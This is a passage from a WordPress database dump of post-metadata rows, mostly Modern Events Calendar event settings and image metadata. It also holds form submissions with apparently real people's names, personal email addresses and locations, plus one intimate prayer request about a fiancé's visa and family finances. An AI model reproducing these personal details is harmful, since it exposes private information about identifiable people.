booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(155658,266356,'mec_display_cancellation_reason_in_single_page',''),(155659,266356,'mec_cancelled_reason',''),(155660,266356,'mec_moved_online_link',''),(155661,266356,'mec_event_status','EventScheduled'),(155662,266356,'mec_fields','a:0:{}'),(155663,266356,'mec_bfixed_fields','a:0:{}'),(155664,266356,'mec_public','1'),(155665,266356,'mec_countdown_method','global'),(155666,266356,'mec_timezone','global'),(155667,266356,'one_occurrence','0'),(155668,266356,'mec_additional_location_ids','a:0:{}'),(155669,266356,'mec_additional_organizer_ids','a:0:{}'),(155670,266356,'mec_currency','a:0:{}'),(155671,266356,'mec_cost',''),(155672,266356,'mec_more_info_target','_self'),(155673,266356,'mec_more_info_title',''),(155674,266356,'mec_more_info',''),(155675,266356,'mec_read_more',''),(155676,266356,'mec_event_date_submit','20210422105713'),(155677,266356,'mec_op','a:0:{}'),(155678,266356,'mec_reg_fields','a:0:{}'),(155679,266356,'mec_reg_fields_global_inheritance','1'),(155680,266356,'mec_ticket_variations','a:0:{}'),(155681,266356,'mec_ticket_variations_global_inheritance','1'),(155682,266356,'mec_fees','a:0:{}'),(155683,266356,'mec_fees_global_inheritance','1'),(155684,266356,'mec_tickets','a:0:{}'),(155685,266356,'mec_booking','a:0:{}'),(155686,266356,'mec_hourly_schedules','a:0:{}'),(155687,266356,'mec_not_in_days',''),(155688,266356,'mec_in_days',''),(155689,266356,'mec_repeat_type',''),(155690,266356,'mec_repeat_interval','1'),(155691,266356,'mec_repeat_end',''),(155692,266356,'mec_repeat_end_at_occurrences',''),(155693,266356,'mec_repeat_end_at_date',''),(155694,266356,'mec_advanced_days','a:0:{}'),(155695,266356,'mec_allday','0'),(155696,266356,'mec_hide_time','0'),(155697,266356,'mec_hide_end_time','0'),(155698,266356,'mec_comment',''),(155699,266356,'mec_repeat_status','0'),(155700,266356,'mec_certain_weekdays','a:0:{}'),(155701,266356,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(155702,266356,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-03-21\";s:4:\"hour\";s:1:\"3\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-03-21\";s:4:\"hour\";s:1:\"4\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(155703,266356,'protect_children',''),(155704,266356,'mec_color',''),(155705,266356,'mec_location_id','118'),(155706,266356,'mec_dont_show_map','1'),(155707,266356,'mec_organizer_id','1'),(155708,266356,'mec_start_date','2022-03-21'),(155709,266356,'mec_start_time_hour','3'),(155710,266356,'mec_start_time_minutes','0'),(155711,266356,'mec_start_time_ampm','PM'),(155712,266356,'mec_start_day_seconds','54000'),(155713,266356,'mec_end_date','2022-03-21'),(155714,266356,'mec_end_time_hour','4'),(155715,266356,'mec_end_time_minutes','0'),(155716,266356,'mec_end_time_ampm','PM'),(155717,266356,'mec_end_day_seconds','57600'),(155720,266356,'_dp_original','266354'),(155719,266356,'_thumbnail_id','266355'),(155721,266356,'_edit_lock','1646785234:15'),(155722,266356,'_edit_last','15'),(170808,267309,'mec_start_date','2022-11-19'),(170806,267309,'mec_countdown_method','global'),(170807,267309,'mec_public','1'),(170805,267309,'mec_timezone','global'),(170804,267309,'mec_comment',''),(170803,267309,'mec_hide_end_time','0'),(155731,266359,'_field_133','karin'),(155732,266359,'_field_134','garcia'),(155733,266359,'_field_135','karingarcia423@gmail.com'),(155734,266359,'_field_137','prayer request'),(155735,266359,'_field_138','My fiance\'s labor certification is being audited for his visa process. Please pray for everything to go well and for the labor certification to be approved quickly.\n\nHe will also have to find a way to help with the expenses in his house. His brother left and his dad doesn\'t make enough money with his job. If you can please pray for god to find him a way to keep up with their needs, perhaps with his 3 brothers helping a little bit. This is really stressful for him'),(155736,266359,'_form_id','13'),(155737,266359,'_seq_num','100'),(155738,266360,'_field_425','John'),(155739,266360,'_field_426','Jackson'),(155740,266360,'_field_427','jjj243@hotmail.com'),(155741,266360,'_form_id','46'),(155742,266360,'_seq_num','42'),(155743,266361,'_field_425','Uche'),(155744,266361,'_field_426','Nwamoh'),(155745,266361,'_field_427','uchenwamoh@yahoo.com'),(155746,266361,'_form_id','46'),(155747,266361,'_seq_num','43'),(155749,266362,'_field_426','Dufu Muller-Uri'),(155750,266362,'_field_427','reginamueller842@gmail.com'),(155751,266362,'_form_id','46'),(155752,266362,'_seq_num','44'),(155753,266363,'_field_425','Lynn'),(155754,266363,'_field_426','Gardner'),(155755,266363,'_field_427','lynnie626@gmail.com'),(155756,266363,'_form_id','46'),(155757,266363,'_seq_num','45'),(155758,266364,'_field_425','Kery'),(155759,266364,'_field_426','Colvin'),(155760,266364,'_field_427','keanchico@yahoo.com'),(155761,266364,'_form_id','46'),(155762,266364,'_seq_num','46'),(155763,266365,'_field_425','michael'),(155764,266365,'_field_426','hales'),(155765,266365,'_field_427','michaelhales77@yahoo.com'),(155766,266365,'_form_id','46'),(155767,266365,'_seq_num','47'),(155768,266366,'_field_425','B'),(155769,266366,'_field_426','Stone '),(155770,266366,'_field_427','bsbsfoxfriendlyfarm@gmail.com'),(155771,266366,'_form_id','46'),(155772,266366,'_seq_num','48'),(155773,266367,'_field_224','Samuel'),(155774,266367,'_field_225','Cole'),(155775,266367,'_field_226','Samuel30030@att.net'),(155776,266367,'_field_227','CO'),(155777,266367,'_field_228','US'),(155778,266367,'_field_229','a:1:{i:0;s:8:\"Loveland\";}'),(155779,266367,'_form_id','21'),(155780,266367,'_seq_num','146'),(155781,266368,'protect_children',''),(155782,266368,'mec_color',''),(155783,266368,'mec_location_id','131'),(155784,266368,'mec_dont_show_map','0'),(155785,266368,'mec_organizer_id','1'),(155786,266368,'mec_start_date','2022-04-10'),(155787,266368,'mec_start_time_hour','1'),(155788,266368,'mec_start_time_minutes','0'),(155789,266368,'mec_start_time_ampm','PM'),(155790,266368,'mec_start_day_seconds','46800'),(155791,266368,'mec_end_date','2022-04-10'),(155792,266368,'mec_end_time_hour','2'),(155793,266368,'mec_end_time_minutes','30'),(155794,266368,'mec_end_time_ampm','PM'),(155795,266368,'mec_end_day_seconds','52200'),(155796,266368,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-04-10\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-04-10\";s:4:\"hour\";s:1:\"2\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(155797,266368,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(155798,266368,'mec_certain_weekdays','a:0:{}'),(155799,266368,'mec_allday','0'),(155800,266368,'mec_hide_time','0'),(155801,266368,'mec_hide_end_time','0'),(155802,266368,'mec_comment',''),(155803,266368,'mec_repeat_status','0'),(155804,266368,'mec_repeat_type',''),(155805,266368,'mec_repeat_interval','1'),(155806,266368,'mec_repeat_end',''),(155807,266368,'mec_repeat_end_at_occurrences',''),(155808,266368,'mec_repeat_end_at_date',''),(155809,266368,'mec_advanced_days','a:0:{}'),(155810,266368,'mec_in_days',''),(155811,266368,'mec_not_in_days',''),(155812,266368,'mec_hourly_schedules','a:0:{}'),(155813,266368,'mec_booking','a:0:{}'),(155814,266368,'mec_tickets','a:0:{}'),(155815,266368,'mec_fees_global_inheritance','1'),(155816,266368,'mec_fees','a:0:{}'),(155817,266368,'mec_ticket_variations_global_inheritance','1'),(155818,266368,'mec_ticket_variations','a:0:{}'),(155819,266368,'mec_reg_fields_global_inheritance','1'),(155820,266368,'mec_reg_fields','a:0:{}'),(155821,266368,'mec_op','a:0:{}'),(155822,266368,'mec_event_date_submit','20210422105713'),(155823,266368,'mec_read_more',''),(155824,266368,'mec_more_info',''),(155825,266368,'mec_more_info_title',''),(155826,266368,'mec_more_info_target','_self'),(155827,266368,'mec_cost',''),(155828,266368,'mec_currency','a:0:{}'),(155829,266368,'mec_additional_organizer_ids','a:0:{}'),(155830,266368,'mec_additional_location_ids','a:0:{}'),(155831,266368,'one_occurrence','0'),(155832,266368,'mec_timezone','global'),(155833,266368,'mec_countdown_method','global'),(155834,266368,'mec_public','1'),(155835,266368,'mec_bfixed_fields','a:0:{}'),(155836,266368,'mec_fields','a:0:{}'),(155837,266368,'mec_event_status','EventScheduled'),(155838,266368,'mec_moved_online_link',''),(155839,266368,'mec_cancelled_reason',''),(155840,266368,'mec_display_cancellation_reason_in_single_page',''),(155841,266368,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(155842,266368,'passster_activate_global_protection',NULL),(155843,266368,'passster_activate_protection',NULL),(155844,266368,'passster_protection_type','password'),(155845,266368,'_wp_old_date','2022-01-18'),(155848,266368,'_dp_original','266298'),(155847,266368,'_thumbnail_id','266369'),(155849,266368,'_edit_lock','1647302781:15'),(155850,266368,'_edit_last','15'),(155851,266369,'_wp_attached_file','2022/03/Relationships.webp'),(155852,266369,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:676;s:6:\"height\";i:380;s:4:\"file\";s:26:\"2022/03/Relationships.webp\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Relationships-300x169.webp\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/webp\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Relationships-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:26:\"Relationships-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:26:\"Relationships-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:26:\"Relationships-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:26:\"Relationships-300x380.webp\";s:5:\"width\";i:300;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/webp\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(155853,266370,'_field_446','Alexa'),(155854,266370,'_field_447','Massey'),(155855,266370,'_field_448','AlexaReevesMassey@gmail.com'),(155856,266370,'_form_id','48'),(155857,266370,'_seq_num','15'),(155858,266371,'passster_protection_type','password'),(155859,266371,'passster_activate_protection',NULL),(155860,266371,'passster_activate_global_protection',NULL),(155861,266371,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(155862,266371,'mec_display_cancellation_reason_in_single_page',''),(155863,266371,'mec_cancelled_reason',''),(155864,266371,'mec_moved_online_link',''),(155865,266371,'mec_event_status','EventScheduled'),(155866,266371,'mec_fields','a:0:{}'),(155867,266371,'mec_bfixed_fields','a:0:{}'),(155868,266371,'mec_public','1'),(155869,266371,'mec_countdown_method','global'),(155870,266371,'mec_timezone','global'),(155871,266371,'one_occurrence','0'),(155872,266371,'mec_additional_location_ids','a:0:{}'),(155873,266371,'mec_additional_organizer_ids','a:0:{}'),(155874,266371,'mec_currency','a:0:{}'),(155875,266371,'mec_cost',''),(155876,266371,'mec_more_info_target','_self'),(155877,266371,'mec_more_info_title',''),(155878,266371,'mec_more_info',''),(155879,266371,'mec_read_more',''),(155880,266371,'mec_event_date_submit','20210422105713'),(155881,266371,'mec_op','a:0:{}'),(155882,266371,'mec_reg_fields','a:0:{}'),(155883,266371,'mec_reg_fields_global_inheritance','1'),(155884,266371,'mec_ticket_variations','a:0:{}'),(155885,266371,'mec_ticket_variations_global_inheritance','1'),(155886,266371,'mec_fees','a:0:{}'),(155887,266371,'mec_fees_global_inheritance','1'),(155888,266371,'mec_tickets','a:0:{}'),(155889,266371,'mec_booking','a:0:{}'),(155890,266371,'mec_hourly_schedules','a:0:{}'),(155891,266371,'mec_not_in_days',''),(155892,266371,'mec_in_days',''),(155893,266371,'mec_repeat_type',''),(155894,266371,'mec_repeat_interval','1'),(155895,266371,'mec_repeat_end',''),(155896,266371,'mec_repeat_end_at_occurrences',''),(155897,266371,'mec_repeat_end_at_date',''),(155898,266371,'mec_advanced_days','a:0:{}'),(155899,266371,'mec_allday','0'),(155900,266371,'mec_hide_time','0'),(155901,266371,'mec_hide_end_time','0'),(155902,266371,'mec_comment',''),(155903,266371,'mec_repeat_status','0'),(155904,266371,'mec_certain_weekdays','a:0:{}'),(155905,266371,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(155906,266371,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-04-08\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-04-08\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(155907,266371,'protect_children',''),(155908,266371,'mec_color',''),(155909,266371,'mec_location_id','118'),(155910,266371,'mec_dont_show_map','1'),(155911,266371,'mec_organizer_id','1'),(155912,266371,'mec_start_date','2022-04-08'),(155913,266371,'mec_start_time_hour','7'),(155914,266371,'mec_start_time_minutes','0'),(155915,266371,'mec_start_time_ampm','PM'),(155916,266371,'mec_start_day_seconds','68400'),(155917,266371,'mec_end_date','2022-04-08'),(155918,266371,'mec_end_time_hour','8'),(155919,266371,'mec_end_time_minutes','0'),(155920,266371,'mec_end_time_ampm','PM'),(155921,266371,'mec_end_day_seconds','72000'),(155922,266371,'_thumbnail_id','265902'),(155924,266371,'_dp_original','266356'),(155925,266371,'_edit_lock','1647400441:2'),(155926,266371,'_edit_last','2'),(155927,266372,'protect_children',''),(155928,266372,'mec_color',''),(155929,266372,'mec_location_id','122'),(155930,266372,'mec_dont_show_map','0'),(155931,266372,'mec_organizer_id','1'),(155932,266372,'mec_start_date','2022-04-03'),(155933,266372,'mec_start_time_hour','10'),(155934,266372,'mec_start_time_minutes','30'),(155935,266372,'mec_start_time_ampm','AM'),(155936,266372,'mec_start_day_seconds','37800'),(155937,266372,'mec_end_date','2022-04-03'),(155938,266372,'mec_end_time_hour','11'),(155939,266372,'mec_end_time_minutes','30'),(155940,266372,'mec_end_time_ampm','AM'),(155941,266372,'mec_end_day_seconds','41400'),(155942,266372,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-04-03\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-04-03\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(155943,266372,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(155944,266372,'mec_certain_weekdays','a:0:{}'),(155945,266372,'mec_allday','0'),(155946,266372,'mec_hide_time','0'),(155947,266372,'mec_hide_end_time','0'),(155948,266372,'mec_comment',''),(155949,266372,'mec_repeat_status','0'),(155950,266372,'mec_repeat_type',''),(155951,266372,'mec_repeat_interval','1'),(155952,266372,'mec_repeat_end',''),(155953,266372,'mec_repeat_end_at_occurrences',''),(155954,266372,'mec_repeat_end_at_date',''),(155955,266372,'mec_advanced_days','a:0:{}'),(155956,266372,'mec_in_days',''),(155957,266372,'mec_not_in_days',''),(155958,266372,'mec_hourly_schedules','a:0:{}'),(155959,266372,'mec_booking','a:0:{}'),(155960,266372,'mec_tickets','a:0:{}'),(155961,266372,'mec_fees_global_inheritance','1'),(155962,266372,'mec_fees','a:0:{}'),(155963,266372,'mec_ticket_variations_global_inheritance','1'),(155964,266372,'mec_ticket_variations','a:0:{}'),(155965,266372,'mec_reg_fields_global_inheritance','1'),(155966,266372,'mec_reg_fields','a:0:{}'),(155967,266372,'mec_op','a:0:{}'),(155968,266372,'mec_event_date_submit','20210422105713'),(155969,266372,'mec_read_more',''),(155970,266372,'mec_more_info',''),(155971,266372,'mec_more_info_title',''),(155972,266372,'mec_more_info_target','_self'),(155973,266372,'mec_cost',''),(155974,266372,'mec_currency','a:0:{}'),(155975,266372,'mec_additional_organizer_ids','a:0:{}'),(155976,266372,'mec_additional_location_ids','a:0:{}'),(155977,266372,'one_occurrence','0'),(155978,266372,'mec_timezone','global'),(155979,266372,'mec_countdown_method','global'),(155980,266372,'mec_public','1'),(155981,266372,'mec_bfixed_fields','a:0:{}'),(155982,266372,'mec_fields','a:0:{}'),(155983,266372,'mec_event_status','EventScheduled'),(155984,266372,'mec_moved_online_link',''),(155985,266372,'mec_cancelled_reason',''),(155986,266372,'mec_display_cancellation_reason_in_single_page',''),(155987,266372,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(155988,266372,'passster_activate_global_protection',NULL),(155989,266372,'passster_activate_protection',NULL),(155990,266372,'passster_protection_type','password'),(155991,266372,'_wp_old_date','2022-01-18'),(155992,266372,'_dp_original','265425'),(155993,266372,'_edit_lock','1647388549:15'),(155994,266372,'_edit_last','15'),(155995,266373,'_wp_attached_file','2022/03/GoldenHU.webp'),(155996,266373,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:676;s:6:\"height\";i:380;s:4:\"file\";s:21:\"2022/03/GoldenHU.webp\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"GoldenHU-300x169.webp\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/webp\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"GoldenHU-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:21:\"GoldenHU-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:21:\"GoldenHU-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:21:\"GoldenHU-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:21:\"GoldenHU-300x380.webp\";s:5:\"width\";i:300;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/webp\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(155997,266372,'_thumbnail_id','266373'),(155998,266375,'protect_children',''),(155999,266375,'mec_color',''),(156000,266375,'mec_location_id','118'),(156001,266375,'mec_dont_show_map','0'),(156002,266375,'mec_organizer_id','1'),(156003,266375,'mec_read_more',''),(156004,266375,'mec_more_info',''),(156005,266375,'mec_more_info_title',''),(156006,266375,'mec_more_info_target','_self'),(156007,266375,'mec_cost',''),(156008,266375,'mec_currency','a:0:{}'),(156009,266375,'mec_additional_organizer_ids','a:0:{}'),(156010,266375,'mec_additional_location_ids','a:0:{}'),(156011,266375,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-04-10\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-04-10\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(156012,266375,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(156013,266375,'mec_certain_weekdays','a:0:{}'),(156014,266375,'mec_allday','0'),(156015,266375,'one_occurrence','0'),(156016,266375,'mec_hide_time','0'),(156017,266375,'mec_hide_end_time','0'),(156018,266375,'mec_comment',''),(156019,266375,'mec_timezone','global'),(156020,266375,'mec_countdown_method','global'),(156021,266375,'mec_public','1'),(156022,266375,'mec_start_date','2022-04-10'),(156023,266375,'mec_start_time_hour','10'),(156024,266375,'mec_start_time_minutes','30'),(156025,266375,'mec_start_time_ampm','AM'),(156026,266375,'mec_start_day_seconds','37800'),(156027,266375,'mec_end_date','2022-04-10'),(156028,266375,'mec_end_time_hour','11'),(156029,266375,'mec_end_time_minutes','30'),(156030,266375,'mec_end_time_ampm','PM'),(156031,266375,'mec_end_day_seconds','84600'),(156032,266375,'mec_repeat_status','0'),(156033,266375,'mec_repeat_type',''),(156034,266375,'mec_repeat_interval','1'),(156035,266375,'mec_repeat_end',''),(156036,266375,'mec_repeat_end_at_occurrences',''),(156037,266375,'mec_repeat_end_at_date',''),(156038,266375,'mec_advanced_days','a:0:{}'),(156039,266375,'mec_in_days',''),(156040,266375,'mec_not_in_days',''),(156041,266375,'mec_hourly_schedules','a:0:{}'),(156042,266375,'mec_booking','a:0:{}'),(156043,266375,'mec_tickets','a:0:{}'),(156044,266375,'mec_fees_global_inheritance','1'),(156045,266375,'mec_fees','a:0:{}'),(156046,266375,'mec_ticket_variations_global_inheritance','1'),(156047,266375,'mec_ticket_variations','a:0:{}'),(156048,266375